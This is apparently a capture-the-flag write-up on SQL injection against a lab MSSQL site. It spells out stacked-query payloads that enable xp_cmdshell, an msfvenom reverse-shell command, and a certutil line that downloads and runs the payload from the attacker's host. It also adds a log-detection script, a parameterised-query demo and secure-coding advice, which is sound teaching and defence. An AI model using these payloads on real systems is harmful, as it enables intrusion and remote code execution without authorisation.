The company website has been hijacked and defaced. The web developers have been locked out of the webserver, and it's up to you to hack back into the server to regain access.
Learning Objectives #
- Learn to understand and identify SQL injection vulnerabilities.
- Exploit stacked queries to turn SQL injection into remote code execution.
- Restore the website and save its reputation.
Overview #
These are my key takeaways from today:
- PHP is a server-side scripting language, meaning the code is executed on the webserver before the final HTML is sent to the user.
- The most common way for PHP to connect to a SQL database is the PHP Data Objects (PDO) extension or a database-specific driver (mysqli for MySQL, sqlsrv for MSSQL).
- SQL injection is when a website fails to secure the input from the user by passing it straight into a query.
- Stacked queries are when you terminate the intended query and execute additional statements in a single injection (for example ' ; INSERT INTO blah...).
- With stacked queries you can call stored procedures, like xp_cmdshell. This requires the database user to be a member of the sysadmin role or to have the ALTER SETTINGS server-level permission.
To enable xp_cmdshell (it is disabled by default):
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
In a payload, this looks like this:
http://10.10.61.141/redacted.php?age='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
- You can't see in a browser whether the above has worked. To leverage xp_cmdshell for Remote Code Execution (RCE) you can generate a payload with msfvenom from metasploit.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR.IP LPORT=1886 -f exe -o rev.exe
Spin up a webserver (python -m http.server) and run the following to download the payload.
http://10.10.61.141/redacted.php?age='; EXEC xp_cmdshell 'certutil -urlcache -f http://YOUR.IP:8000/rev.exe C:\Windows\Temp\rev.exe'; --
Then run the newly downloaded executable:
http://10.10.61.141/redacted.php?age='; EXEC xp_cmdshell 'C:\Windows\Temp\rev.exe'; --
You now have a shell on the box!
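From the defender's side, the whole chain above (stacked EXEC, sp_configure flipping xp_cmdshell on, certutil pulling a file) leaves its fingerprints in the web server's access log, because every step arrives in the age parameter of a GET request. The following is an added example, not part of the original write-up or the room: it URL-decodes the query string of constructed combined-log-style lines and flags the stacked-query and xp_cmdshell indicators. The log lines, the /redacted.php path and the indicator names are all constructed for illustration.

```python
"""Flag web requests whose query string carries stacked-query / xp_cmdshell
indicators. Added example; the log lines below are constructed, not captured."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines: one normal search, the two-step enable/download
# sequence from the write-up, and a low-impact boolean probe.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2023:10:01:02 +0000] "GET /redacted.php?age=30 HTTP/1.1" 200 5120
10.0.0.7 - - [10/Dec/2023:10:01:09 +0000] "GET /redacted.php?age=%27%3B+EXEC+sp_configure+%27show+advanced+options%27%2C+1%3B+RECONFIGURE%3B+EXEC+sp_configure+%27xp_cmdshell%27%2C+1%3B+RECONFIGURE%3B+-- HTTP/1.1" 500 812
10.0.0.7 - - [10/Dec/2023:10:01:20 +0000] "GET /redacted.php?age=%27%3B+EXEC+xp_cmdshell+%27certutil+-urlcache+-f+http%3A%2F%2F10.0.0.7%3A8000%2Frev.exe+C%3A%5CWindows%5CTemp%5Crev.exe%27%3B+-- HTTP/1.1" 500 812
10.0.0.9 - - [10/Dec/2023:10:02:00 +0000] "GET /redacted.php?age=bob%27+AND+1%3D2-- HTTP/1.1" 200 300
"""

# Indicator name -> pattern applied to the URL-decoded query string.
INDICATORS = {
    "stacked_exec": re.compile(r";\s*EXEC\b", re.I),              # statement terminator + EXEC
    "enable_xp_cmdshell": re.compile(r"sp_configure\s*'xp_cmdshell'", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "lolbin_download": re.compile(r"\bcertutil\b.*-urlcache", re.I),
    "boolean_probe": re.compile(r"'\s*(?:AND|OR)\s+1\s*=\s*[12]", re.I),
}
# Indicators that mean OS-level execution is being attempted, not just probing.
HIGH = {"stacked_exec", "enable_xp_cmdshell", "xp_cmdshell", "lolbin_download"}

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def parse_request(line):
    """Return (client_ip, path, decoded_query) or None if the line is not a request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return m.group("ip"), path, unquote_plus(query)


def match_indicators(query):
    """Names of every indicator that fires on the decoded query string."""
    return [name for name, rx in INDICATORS.items() if rx.search(query)]


def analyze(log_text):
    """One finding per request that trips at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        ip, path, query = parsed
        hits = match_indicators(query)
        if hits:
            findings.append({
                "ip": ip, "path": path, "query": query, "indicators": hits,
                "severity": "high" if HIGH & set(hits) else "low",
            })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["path"], ", ".join(f["indicators"]))
```

Decoding before matching matters: the raw log line contains %27 and %3B, not the quote and semicolon the patterns look for, and the same trick with double encoding is why a pattern list like this is a triage aid rather than a complete control.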
SQLi, OR 1=1 #
The check for SQLi is often ' OR 1=1-- -. This can destroy a database if you don't know the underlying queries.
For example, a query might use values from an initial request in multiple SQL queries. If you use OR 1=1 and this gets passed into a second query that uses UPDATE or DELETE, you can potentially delete an entire table since OR 1=1 is always true.
Instead you can use something safer, like bob' AND 1=2--. This still demonstrates the SQL injection without putting the entire table's records at risk.
Coding best practices #
- Input validation: Sanitise and validate all user-supplied input to ensure it adheres to expected data types and formats. Reject everything else.
- Parameterised statements: Use prepared statements and parameterised queries in your database interactions.
- Stored procedures: Use stored procedures to encapsulate your SQL logic whenever possible. This reduces the risk of SQL injection by separating user input from SQL code.
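The two points above, that OR 1=1 can cascade into a second UPDATE or DELETE while bob' AND 1=2-- only proves the flaw, and that parameterised statements stop both, are easiest to see side by side. This is an added example using Python's built-in sqlite3, not the room's PHP/MSSQL code: the gifts table, its rows and the view-counter UPDATE are constructed to mirror the "value reused in a second query" situation described in the text.

```python
"""String-built query beside its parameterised form, and the blast radius of
two SQLi probes when the same input feeds a second UPDATE. Added example with
SQLite; the table and rows are constructed."""
import sqlite3


def fresh_db():
    """In-memory gift table with constructed rows and a per-row view counter."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE gifts (name TEXT, age INTEGER, views INTEGER DEFAULT 0)")
    con.executemany("INSERT INTO gifts (name, age) VALUES (?, ?)",
                    [("bob", 30), ("alice", 8), ("carol", 65)])
    return con


def search_vulnerable(con, name):
    """User input is concatenated straight into the SQL text (the bug)."""
    rows = con.execute(f"SELECT name, age FROM gifts WHERE name = '{name}'").fetchall()
    # A second query reuses the same raw input, here to bump a view counter;
    # in a real app this could just as well be a DELETE.
    con.execute(f"UPDATE gifts SET views = views + 1 WHERE name = '{name}'")
    con.commit()
    return rows


def search_parameterised(con, name):
    """Same logic with placeholders: input is bound as data, never parsed as SQL."""
    rows = con.execute("SELECT name, age FROM gifts WHERE name = ?", (name,)).fetchall()
    con.execute("UPDATE gifts SET views = views + 1 WHERE name = ?", (name,))
    con.commit()
    return rows


def rows_touched(con):
    """How many rows the UPDATE hit, i.e. the side effect of the probe."""
    return con.execute("SELECT COUNT(*) FROM gifts WHERE views > 0").fetchone()[0]


def demo(probe, vulnerable=True):
    """Run one probe against a fresh table; return (rows returned, rows updated)."""
    con = fresh_db()
    search = search_vulnerable if vulnerable else search_parameterised
    rows = search(con, probe)
    return len(rows), rows_touched(con)


if __name__ == "__main__":
    for probe in ("bob", "' OR 1=1--", "bob' AND 1=2--"):
        print(f"{probe!r:20} vulnerable={demo(probe)}  parameterised={demo(probe, False)}")
```

Against the vulnerable version, "bob" returns one row and updates one; ' OR 1=1-- returns all three rows and updates all three, which is the cascade the text warns about; bob' AND 1=2-- returns nothing and updates nothing even though bob exists, which is all the evidence a tester needs. With the parameterised version every probe is treated as a literal name, so the injected strings match no row and touch no row.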
Questions #
- Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?
Just navigate around the website until you find a webpage where you can Search for gifts.
- Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?
Insert a single quote (') into the age parameter in the URL and look at the database query error you receive.
- Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?
Rewrite the URL to 10.10.61.141/REDACTED.php?age='OR 1=1--
- What flag is in the note file Gr33dstr left behind on the system?
After getting a shell, run type C:\Users\Administrator\Desktop\note.txt.
- What is the flag you receive on the homepage after restoring the website?
Run the restore_website.bat file from the Administrator's Desktop, then visit the website again in a browser.